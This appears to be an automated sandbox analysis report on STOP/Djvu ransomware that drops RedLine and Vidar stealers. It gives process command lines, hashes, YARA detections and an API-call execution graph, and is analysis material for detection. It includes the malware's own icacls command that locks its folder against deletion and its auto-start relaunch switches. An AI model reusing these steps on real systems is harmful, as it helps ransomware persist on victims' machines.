                                                                                                                                                                      Commandline:icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:29'696 bytes
                                                                                                                                                                      MD5 hash:2E49585E4E08565F52090B144062F97E
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:2
                                                                                                                                                                      Start time:06:47:55
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe --Task
                                                                                                                                                                      Imagebase:0x2e0000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1666073748.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2902092537.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000002.2902285279.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000002.00000000.1666176128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: unknown
                                                                                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe, Author: ditekSHen
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 86%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:3
                                                                                                                                                                      Start time:06:47:55
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTask
                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2361836634.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000000.1666987231.0000000000B91000.00000020.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000003.00000002.2361935877.0000000000C5C000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:4
                                                                                                                                                                      Start time:06:48:03
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:367'104 bytes
                                                                                                                                                                      MD5 hash:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1746887705.0000000000633000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                      • Detection: 79%, ReversingLabs
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:5
                                                                                                                                                                      Start time:06:48:03
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe"
                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                      File size:367'104 bytes
                                                                                                                                                                      MD5 hash:C4070DA9F9B0581171AF16E681CCDFF8
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000005.00000002.2903117606.000000000044C000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:false

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:06:48:08
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
                                                                                                                                                                      Imagebase:0x2e0000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1797777128.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1841882825.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000000.1797319331.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1841955191.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:10
                                                                                                                                                                      Start time:06:48:19
                                                                                                                                                                      Start date:12/01/2024
                                                                                                                                                                      Path:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --AutoStart
                                                                                                                                                                      Imagebase:0x2e0000
                                                                                                                                                                      File size:1'150'976 bytes
                                                                                                                                                                      MD5 hash:3EEB7B2030517F91FDF0F4C5278D8E76
                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.1921214760.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000002.1921120348.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000000.1910328345.00000000002E1000.00000020.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000A.00000000.1910389769.00000000003AC000.00000002.00000001.01000000.00000007.sdmp, Author: unknown
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:2.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:36.2%
                                                                                                                                                                        Total number of Nodes:836
                                                                                                                                                                        Total number of Limit Nodes:84
                                                                                                                                                                        execution_graph 38411 b9a290 38416 bacc50 38411->38416 38425 bb3b4c 38416->38425 38418 bacc5d 38421 b9a299 38418->38421 38435 bdf1bb 59 API calls 3 library calls 38418->38435 38422 bb19ac 38421->38422 38470 bb18b0 38422->38470 38424 b9a2a8 38428 bb3b54 38425->38428 38427 bb3b6e 38427->38418 38428->38427 38430 bb3b72 std::exception::exception 38428->38430 38436 bb0c62 38428->38436 38453 bb793d DecodePointer 38428->38453 38454 bc0eca RaiseException 38430->38454 38432 bb3b9c 38455 bc0d91 58 API calls _free 38432->38455 38434 bb3bae 38434->38418 38437 bb0cdd 38436->38437 38444 bb0c6e 38436->38444 38464 bb793d DecodePointer 38437->38464 38439 bb0ce3 38465 bb5208 58 API calls __getptd_noexit 38439->38465 38442 bb0ca1 RtlAllocateHeap 38442->38444 38452 bb0cd5 38442->38452 38444->38442 38445 bb0c79 38444->38445 38446 bb0cc9 38444->38446 38450 bb0cc7 38444->38450 38461 bb793d DecodePointer 38444->38461 38445->38444 38456 bb7f51 58 API calls 2 library calls 38445->38456 38457 bb7fae 58 API calls 10 library calls 38445->38457 38458 bb7b0b 38445->38458 38462 bb5208 58 API calls __getptd_noexit 38446->38462 38463 bb5208 58 API calls __getptd_noexit 38450->38463 38452->38428 38453->38428 38454->38432 38455->38434 38456->38445 38457->38445 38466 bb7ad7 GetModuleHandleExW 38458->38466 38461->38444 38462->38450 38463->38452 38464->38439 38465->38452 38467 bb7af0 GetProcAddress 38466->38467 38468 bb7b07 ExitProcess 38466->38468 38467->38468 38469 bb7b02 38467->38469 38469->38468 38471 bb18bc _fgetws 38470->38471 38478 bb7dfc 38471->38478 38477 bb18e3 _fgetws 38477->38424 38495 bb8af7 38478->38495 38480 bb18c5 38481 bb18f4 DecodePointer DecodePointer 38480->38481 38482 bb18d1 38481->38482 38483 bb1921 38481->38483 38492 bb18ee 38482->38492 38483->38482 38504 bba78d 59 API calls __fclose_nolock 38483->38504 38485 bb1984 EncodePointer EncodePointer 38485->38482 38486 bb1958 38486->38482 38490 bb1972 EncodePointer 38486->38490 38506 bb8d25 61 API calls 2 library calls 38486->38506 38487 bb1933 38487->38485 38487->38486 38505 bb8d25 61 API calls 2 library calls 38487->38505 38490->38485 38491 bb196c 38491->38482 38491->38490 38507 bb7e05 38492->38507 38496 bb8b1b EnterCriticalSection 38495->38496 38497 bb8b08 38495->38497 38496->38480 38502 bb8b9f 58 API calls 9 library calls 38497->38502 38499 bb8b0e 38499->38496 38503 bb7c2e 58 API calls 3 library calls 38499->38503 38502->38499 38504->38487 38505->38486 38506->38491 38510 bb8c81 LeaveCriticalSection 38507->38510 38509 bb18f3 38509->38477 38510->38509 38511 bb3f84 38512 bb3f90 _fgetws 38511->38512 38548 bc2603 GetStartupInfoW 38512->38548 38514 bb3f95 38550 bb78d5 GetProcessHeap 38514->38550 38516 bb3fed 38517 bb3ff8 38516->38517 38880 bb411a 58 API calls 3 library calls 38516->38880 38551 bb5141 38517->38551 38520 bb3ffe 38521 bb4009 __RTC_Initialize 38520->38521 38881 bb411a 58 API calls 3 library calls 38520->38881 38572 bb8754 38521->38572 38524 bb4018 38525 bb4024 GetCommandLineW 38524->38525 38882 bb411a 58 API calls 3 library calls 38524->38882 38591 bc235f GetEnvironmentStringsW 38525->38591 38528 bb4023 38528->38525 38531 bb403e 38532 bb4049 38531->38532 38883 bb7c2e 58 API calls 3 library calls 38531->38883 38601 bc21a1 38532->38601 38536 bb405a 38615 bb7c68 38536->38615 38539 bb4062 38540 bb406d __wwincmdln 38539->38540 38885 bb7c2e 58 API calls 3 library calls 38539->38885 38621 ba9f90 38540->38621 38543 bb4081 38544 bb4090 38543->38544 38877 bb7f3d 38543->38877 38886 bb7c59 58 API calls _doexit 38544->38886 38547 bb4095 _fgetws 38549 bc2619 38548->38549 38549->38514 38550->38516 38887 bb7d6c 36 API calls 2 library calls 38551->38887 38553 bb5146 38888 bb8c48 InitializeCriticalSectionAndSpinCount __getstream 38553->38888 38555 bb514b 38556 bb514f 38555->38556 38890 bc24f7 TlsAlloc 38555->38890 38889 bb51b7 61 API calls 2 library calls 38556->38889 38559 bb5154 38559->38520 38560 bb5161 38560->38556 38561 bb516c 38560->38561 38891 bb8c96 38561->38891 38564 bb51ae 38899 bb51b7 61 API calls 2 library calls 38564->38899 38567 bb51b3 38567->38520 38568 bb518d 38568->38564 38569 bb5193 38568->38569 38898 bb508e 58 API calls 4 library calls 38569->38898 38571 bb519b GetCurrentThreadId 38571->38520 38573 bb8760 _fgetws 38572->38573 38574 bb8af7 __lock 58 API calls 38573->38574 38575 bb8767 38574->38575 38576 bb8c96 __calloc_crt 58 API calls 38575->38576 38578 bb8778 38576->38578 38577 bb87e3 GetStartupInfoW 38585 bb87f8 38577->38585 38588 bb8927 38577->38588 38578->38577 38579 bb8783 _fgetws @_EH4_CallFilterFunc@8 38578->38579 38579->38524 38580 bb89ef 38913 bb89ff LeaveCriticalSection _doexit 38580->38913 38582 bb8c96 __calloc_crt 58 API calls 38582->38585 38583 bb8974 GetStdHandle 38583->38588 38584 bb8987 GetFileType 38584->38588 38585->38582 38587 bb8846 38585->38587 38585->38588 38586 bb887a GetFileType 38586->38587 38587->38586 38587->38588 38911 bc263e InitializeCriticalSectionAndSpinCount 38587->38911 38588->38580 38588->38583 38588->38584 38912 bc263e InitializeCriticalSectionAndSpinCount 38588->38912 38592 bb4034 38591->38592 38593 bc2370 38591->38593 38597 bc1f64 GetModuleFileNameW 38592->38597 38914 bb8cde 38593->38914 38595 bc2396 ___check_float_string 38596 bc23ac FreeEnvironmentStringsW 38595->38596 38596->38592 38599 bc1f98 _wparse_cmdline 38597->38599 38598 bc1fd8 _wparse_cmdline 38598->38531 38599->38598 38600 bb8cde __malloc_crt 58 API calls 38599->38600 38600->38598 38602 bc21ba _GetLcidFromLangCountry 38601->38602 38606 bb404f 38601->38606 38603 bb8c96 __calloc_crt 58 API calls 38602->38603 38611 bc21e3 _GetLcidFromLangCountry 38603->38611 38604 bc223a 38922 bb0bed 58 API calls 2 library calls 38604->38922 38606->38536 38884 bb7c2e 58 API calls 3 library calls 38606->38884 38607 bb8c96 __calloc_crt 58 API calls 38607->38611 38608 bc225f 38923 bb0bed 58 API calls 2 library calls 38608->38923 38611->38604 38611->38606 38611->38607 38611->38608 38612 bc2276 38611->38612 38921 bb962f 58 API calls __fclose_nolock 38611->38921 38924 bb42fd 8 API calls 2 library calls 38612->38924 38614 bc2282 38616 bb7c74 __IsNonwritableInCurrentImage 38615->38616 38925 bcaeb5 38616->38925 38618 bb7c92 __initterm_e 38619 bb19ac __cinit 67 API calls 38618->38619 38620 bb7cb1 __cinit __IsNonwritableInCurrentImage 38618->38620 38619->38620 38620->38539 38622 ba9fa0 __ftell_nolock 38621->38622 38928 b9cf10 38622->38928 38624 ba9fb0 38625 ba9fc4 GetCurrentProcess GetLastError SetPriorityClass 38624->38625 38626 ba9fb4 38624->38626 38628 ba9fe6 38625->38628 38629 ba9fe4 GetLastError 38625->38629 39152 ba24e0 109 API calls _memset 38626->39152 38942 bad3c0 38628->38942 38629->38628 38630 ba9fb9 38630->38543 38633 bab669 39233 bdf23e 59 API calls 2 library calls 38633->39233 38634 baa022 38945 bad340 38634->38945 38636 bab673 39234 bdf23e 59 API calls 2 library calls 38636->39234 38641 baa065 38950 ba3a90 38641->38950 38645 baa159 GetCommandLineW CommandLineToArgvW lstrcpyW 38647 baa33d GlobalFree 38645->38647 38653 baa196 38645->38653 38646 baa100 38646->38645 38648 baa45c 38647->38648 38649 baa354 38647->38649 39006 ba2220 38648->39006 38651 ba2220 76 API calls 38649->38651 38652 baa359 38651->38652 38655 baa466 38652->38655 39021 b9ef50 38652->39021 38653->38647 38654 baa1cc lstrcmpW lstrcmpW 38653->38654 38657 baa24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 38653->38657 38658 bb0235 60 API calls _LanguageEnumProc@4 38653->38658 38663 baa361 38653->38663 38654->38653 38655->38543 38657->38653 38658->38653 38659 baa48f 38661 baa4ef 38659->38661 39026 ba3ea0 38659->39026 38662 ba1cd0 92 API calls 38661->38662 38665 baa563 38662->38665 38966 bb3c92 38663->38966 38697 baa5db 38665->38697 39047 ba4690 38665->39047 38667 baa395 OpenProcess 38668 baa3a9 WaitForSingleObject CloseHandle 38667->38668 38669 baa402 38667->38669 38668->38669 38673 baa3cb 38668->38673 38969 ba1cd0 38669->38969 38670 baa6f9 39154 ba1a10 8 API calls 38670->39154 38688 baa3e2 GlobalFree 38673->38688 38689 baa3d4 Sleep 38673->38689 39153 ba1ab0 PeekMessageW DispatchMessageW PeekMessageW 38673->39153 38674 baa6fe 38677 baa70f 38674->38677 38678 baa8b6 CreateMutexA 38674->38678 38675 baa5a9 38680 ba4690 59 API calls 38675->38680 38683 baa7dc 38677->38683 38693 b9ef50 58 API calls 38677->38693 38684 baa8ca 38678->38684 38686 baa5d4 38680->38686 38681 baa40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 38682 baa451 38681->38682 38682->38543 38690 b9ef50 58 API calls 38683->38690 38687 b9ef50 58 API calls 38684->38687 38685 baa624 GetVersion 38685->38670 38691 baa632 lstrcpyW lstrcatW lstrcatW 38685->38691 39070 b9d240 CoInitialize 38686->39070 38701 baa8da 38687->38701 38694 baa3f7 38688->38694 38689->38667 38695 baa7ec 38690->38695 38696 baa674 _memset 38691->38696 38704 baa72f 38693->38704 38694->38543 38698 baa7f1 lstrlenA 38695->38698 38700 baa6b4 ShellExecuteExW 38696->38700 38697->38670 38697->38674 38697->38678 38697->38685 38699 bb0c62 _malloc 58 API calls 38698->38699 38702 baa810 _memset 38699->38702 38700->38674 38721 baa6e3 38700->38721 38703 ba3ea0 59 API calls 38701->38703 38717 baa92f 38701->38717 38706 baa81e MultiByteToWideChar lstrcatW 38702->38706 38703->38701 38705 ba3ea0 59 API calls 38704->38705 38708 baa780 38704->38708 38705->38704 38706->38698 38707 baa847 lstrlenW 38706->38707 38709 baa8a0 CreateMutexA 38707->38709 38710 baa856 38707->38710 38711 baa79c CreateThread 38708->38711 38712 baa792 38708->38712 38709->38684 39156 b9e760 95 API calls 38710->39156 38711->38683 38716 baa7d0 38711->38716 39500 badbd0 95 API calls 4 library calls 38711->39500 39155 ba3ff0 59 API calls ___check_float_string 38712->39155 38715 baa860 CreateThread WaitForSingleObject 38715->38709 39501 bae690 185 API calls 8 library calls 38715->39501 38716->38683 39157 ba5c10 38717->39157 38719 baa98c 39172 ba2840 60 API calls 38719->39172 38721->38543 38722 baa997 39173 ba0fc0 93 API calls 4 library calls 38722->39173 38724 baa9ab 38725 baa9c2 lstrlenA 38724->38725 38725->38721 38726 baa9d8 38725->38726 38727 ba5c10 59 API calls 38726->38727 38728 baaa23 38727->38728 39174 ba2840 60 API calls 38728->39174 38730 baaa2e lstrcpyA 38732 baaa4b 38730->38732 38732->38732 38733 ba5c10 59 API calls 38732->38733 38734 baaa90 38733->38734 38735 b9ef50 58 API calls 38734->38735 38736 baaaa0 38735->38736 38737 ba3ea0 59 API calls 38736->38737 38738 baaaf5 38736->38738 38737->38736 39175 ba3ff0 59 API calls ___check_float_string 38738->39175 38740 baab1d 39176 ba2900 38740->39176 38742 b9ef50 58 API calls 38744 baabc5 38742->38744 38743 baab28 _memmove 38743->38742 38744->38744 38745 ba3ea0 59 API calls 38744->38745 38746 baac1e 38744->38746 38745->38744 39181 ba3ff0 59 API calls ___check_float_string 38746->39181 38748 baac46 38749 ba2900 60 API calls 38748->38749 38751 baac51 _memmove 38749->38751 38750 b9ef50 58 API calls 38752 baacee 38750->38752 38751->38750 38753 ba3ea0 59 API calls 38752->38753 38754 baad43 38752->38754 38753->38752 39182 ba3ff0 59 API calls ___check_float_string 38754->39182 38756 baad6b 38757 ba2900 60 API calls 38756->38757 38760 baad76 _memmove 38757->38760 38758 ba5c10 59 API calls 38759 baae2a 38758->38759 39183 ba3580 59 API calls 38759->39183 38760->38758 38762 baae3c 38763 ba5c10 59 API calls 38762->38763 38764 baae76 38763->38764 39184 ba3580 59 API calls 38764->39184 38766 baae82 38767 ba5c10 59 API calls 38766->38767 38768 baaebc 38767->38768 39185 ba3580 59 API calls 38768->39185 38770 baaec8 38771 ba5c10 59 API calls 38770->38771 38772 baaf02 38771->38772 39186 ba3580 59 API calls 38772->39186 38774 baaf0e 38775 ba5c10 59 API calls 38774->38775 38776 baaf48 38775->38776 39187 ba3580 59 API calls 38776->39187 38778 baaf54 38779 ba5c10 59 API calls 38778->38779 38780 baaf8e 38779->38780 39188 ba3580 59 API calls 38780->39188 38782 baaf9a 38783 ba5c10 59 API calls 38782->38783 38784 baafd4 38783->38784 39189 ba3580 59 API calls 38784->39189 38786 baafe0 39190 ba3100 59 API calls 38786->39190 38788 bab001 39191 ba3580 59 API calls 38788->39191 38790 bab025 39192 ba3100 59 API calls 38790->39192 38792 bab03c 39193 ba3580 59 API calls 38792->39193 38794 bab059 39194 ba3100 59 API calls 38794->39194 38796 bab070 39195 ba3580 59 API calls 38796->39195 38798 bab07c 39196 ba3100 59 API calls 38798->39196 38800 bab093 39197 ba3580 59 API calls 38800->39197 38802 bab09f 39198 ba3100 59 API calls 38802->39198 38804 bab0b6 39199 ba3580 59 API calls 38804->39199 38806 bab0c2 39200 ba3100 59 API calls 38806->39200 38808 bab0d9 39201 ba3580 59 API calls 38808->39201 38810 bab0e5 39202 ba3100 59 API calls 38810->39202 38812 bab0fc 39203 ba3580 59 API calls 38812->39203 38814 bab108 38816 bab130 38814->38816 39204 bacdd0 59 API calls 38814->39204 38817 b9ef50 58 API calls 38816->38817 38818 bab16e 38817->38818 38820 bab1a5 GetUserNameW 38818->38820 39205 ba2de0 59 API calls 38818->39205 38821 bab1c9 38820->38821 39206 ba2c40 38821->39206 38823 bab1d8 39213 ba2bf0 59 API calls 38823->39213 38825 bab1ea 39214 b9ecb0 60 API calls 2 library calls 38825->39214 38827 bab2f5 39217 ba36c0 59 API calls 38827->39217 38829 bab308 39218 b9ca70 59 API calls 38829->39218 38831 bab311 39219 ba30b0 59 API calls 38831->39219 38833 ba2c40 59 API calls 38848 bab1f3 38833->38848 38834 bab322 39220 b9c740 102 API calls 4 library calls 38834->39220 38836 ba2900 60 API calls 38836->38848 38837 bab327 39221 ba11c0 169 API calls 2 library calls 38837->39221 38840 bab33b 39222 baba10 LoadCursorW RegisterClassExW 38840->39222 38842 bab343 39223 baba80 CreateWindowExW ShowWindow UpdateWindow 38842->39223 38844 ba3100 59 API calls 38844->38848 38845 bab34b 38849 bab34f 38845->38849 39224 ba0a50 65 API calls 38845->39224 38848->38827 38848->38833 38848->38836 38848->38844 39215 ba3580 59 API calls 38848->39215 39216 b9f1f0 59 API calls 38848->39216 38849->38721 38850 bab379 39225 ba3100 59 API calls 38850->39225 38852 bab3a5 39226 ba3580 59 API calls 38852->39226 38854 bab48b 39232 bafdc0 CreateThread 38854->39232 38856 bab49f GetMessageW 38857 bab4bf 38856->38857 38858 bab4ed 38856->38858 38860 bab4c5 TranslateMessage DispatchMessageW GetMessageW 38857->38860 38861 bab55b 38858->38861 38862 bab502 PostThreadMessageW 38858->38862 38860->38858 38860->38860 38864 bab5bb 38861->38864 38865 bab564 PostThreadMessageW 38861->38865 38863 bab510 PeekMessageW 38862->38863 38866 bab546 WaitForSingleObject 38863->38866 38867 bab526 DispatchMessageW PeekMessageW 38863->38867 38864->38849 38869 bab5d2 CloseHandle 38864->38869 38868 bab570 PeekMessageW 38865->38868 38866->38861 38866->38863 38867->38866 38867->38867 38870 bab5a6 WaitForSingleObject 38868->38870 38871 bab586 DispatchMessageW PeekMessageW 38868->38871 38869->38849 38870->38864 38870->38868 38871->38870 38871->38871 38876 bab3b3 38876->38854 39227 bac330 59 API calls 38876->39227 39228 bac240 59 API calls 38876->39228 39229 bab8b0 59 API calls 38876->39229 39230 ba3260 59 API calls 38876->39230 39231 bafa10 CreateThread 38876->39231 39502 bb7e0e 38877->39502 38879 bb7f4c 38879->38544 38880->38517 38881->38521 38882->38528 38886->38547 38887->38553 38888->38555 38889->38559 38890->38560 38894 bb8c9d 38891->38894 38893 bb5179 38893->38564 38897 bc2553 TlsSetValue 38893->38897 38894->38893 38896 bb8cbb 38894->38896 38900 bcb813 38894->38900 38896->38893 38896->38894 38908 bc29c9 Sleep 38896->38908 38897->38568 38898->38571 38899->38567 38901 bcb81e 38900->38901 38904 bcb839 38900->38904 38902 bcb82a 38901->38902 38901->38904 38909 bb5208 58 API calls __getptd_noexit 38902->38909 38905 bcb849 HeapAlloc 38904->38905 38906 bcb82f 38904->38906 38910 bb793d DecodePointer 38904->38910 38905->38904 38905->38906 38906->38894 38908->38896 38909->38906 38910->38904 38911->38587 38912->38588 38913->38579 38916 bb8cec 38914->38916 38915 bb0c62 _malloc 58 API calls 38915->38916 